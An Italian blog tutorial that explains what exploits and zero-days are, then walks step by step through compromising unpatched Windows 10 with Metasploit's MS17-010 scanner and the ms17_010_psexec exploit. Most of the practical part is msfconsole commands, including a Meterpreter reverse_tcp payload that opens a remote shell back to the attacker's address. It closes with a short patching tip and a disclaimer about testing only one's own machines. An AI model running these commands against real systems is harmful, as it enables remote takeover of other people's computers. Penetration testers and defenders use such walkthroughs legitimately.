Cari lettori di Tecnogalaxy, oggi parleremo dell’exploit MS17_010_PSEXEC che ci permetterà di hackerare Windows 10, ovviamente se il sistema da testare non ha questa patch installata.

Come sempre il consiglio che do è quello di tenere sempre aggiornati i propri sistemi operativi, che siano PC, server o device.

Questo tipo di exploit è pericoloso, chi lo mette in atto potrebbe prendere possesso del sistema che viene attaccato.

Cosa sono gli exploit?

Gli exploit sono un sottoinsieme di malware, sono definiti programmi dannosi che contengono dati o codici che possono essere eseguiti sfruttando una o più vulnerabilità di un software presente su un computer locale o in remoto.

Immaginiamo che il nostro browser contenga una vulnerabilità che consente di eseguire  un “codice arbitrario” (consente di installare e far partire un programma dannoso) a vostra insaputa.

Spesso il primo passo dei cybercriminali è quello di ottenere sempre più autorizzazioni sul sistema per poterne prendere il controllo.

Esiste un altro problema che sono gli exploit di vulnerabilità ancora sconosciute, scoperte e utilizzate dai cybercriminali, chiamate in gergo tecnico vulnerabilità zero-day (o 0 day).

Spesso capita che passa del tempo prima che i vendor si accorgano del problema e rilascino una patch per risolverlo.

I cybercriminali, spesso preferiscono gli exploit ad altri metodi d’infezione come l’ingegneria sociale, perchè portano praticamente a risultati sicuri.

Ci sono due casi in cui gli utenti potrebbero venire ingaggiati dagli exploit, il primo visitando un sito Internet che contiene un codice exploit dannoso, il secondo aprendo un file apparentemente legittimo che però nasconde al suo interno il codice dannoso. (Mail di spam o di phishing nella maggior parte dei casi contengono gli exploit).

Purtroppo gli exploit sono una minaccia anche per gli utenti più diligenti che si preoccupano di aggiornare sempre i software, questo perché il gap di tempo tra la scoperta della vulnerabilità e il rilascio della patch non è sempre immediato.

Come potete immaginare durante questa fase di tempo, gli exploit agiscono minacciando la sicurezza di quasi tutti gli utenti di Internet.

Purtroppo in molti casi non vengono aggiornati i sistemi operativi perché tale aggiornamento richiede un fermo delle attività, e diversi responsabili dei sistemi sottovalutano questa pericolosità.

Kaspersky Internet Security, e altri prodotti Kaspersky Lab, hanno a bordo una tecnologia di prevenzione automatica degli exploit, questa tecnologia utilizza tutte le informazioni sui comportamenti degli exploit più conosciuti.

Questi comportamenti dei malware aiutano queste applicazioni a prevenire le infezioni anche in caso di exploit che sfruttano vulnerabilità zero day sconosciute.

Iniziamo il test!

Come sempre utilizziamo il nostro caro amico Kali Linux.

Lanciamo il potente msfconsole e apriamo una shell scrivendo il seguente comando:

msfconsole

Cerchiamo l’exploit da utilizzare:

search ms17

Adesso dobbiamo dire a msfconsole cosa utilizzare:

use auxiliary/scanner/smb/smb_ms17_010
set RHOST S “l’ip della macchina da testare”
run

Se la macchina è vulnerabile vedremo questo messaggio:

Apriamo un’altra shell di Metasploit e scriviamo:

use exploit/windows/smb/ms17_010_psexec
set RHOSTS "L'ip della macchina testare"
set payload windows/meterpreter/reverse_tcp
set LHOST "Il nostro indirizzo ip"
exploit

Se tutto sarà andato a buon fine vedremo questo messaggio:

Come difendersi

Tenere aggiornato il proprio sistema operativo con tutte le patch rilasciate dalla casa produttrice e monitorare sempre l’andamento della vostra macchina.

Come sempre fatene buon uso facendo dei test su vostri device / computer, farli su devaice/computer non vostri è illegale.

Al prossimo articolo!

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.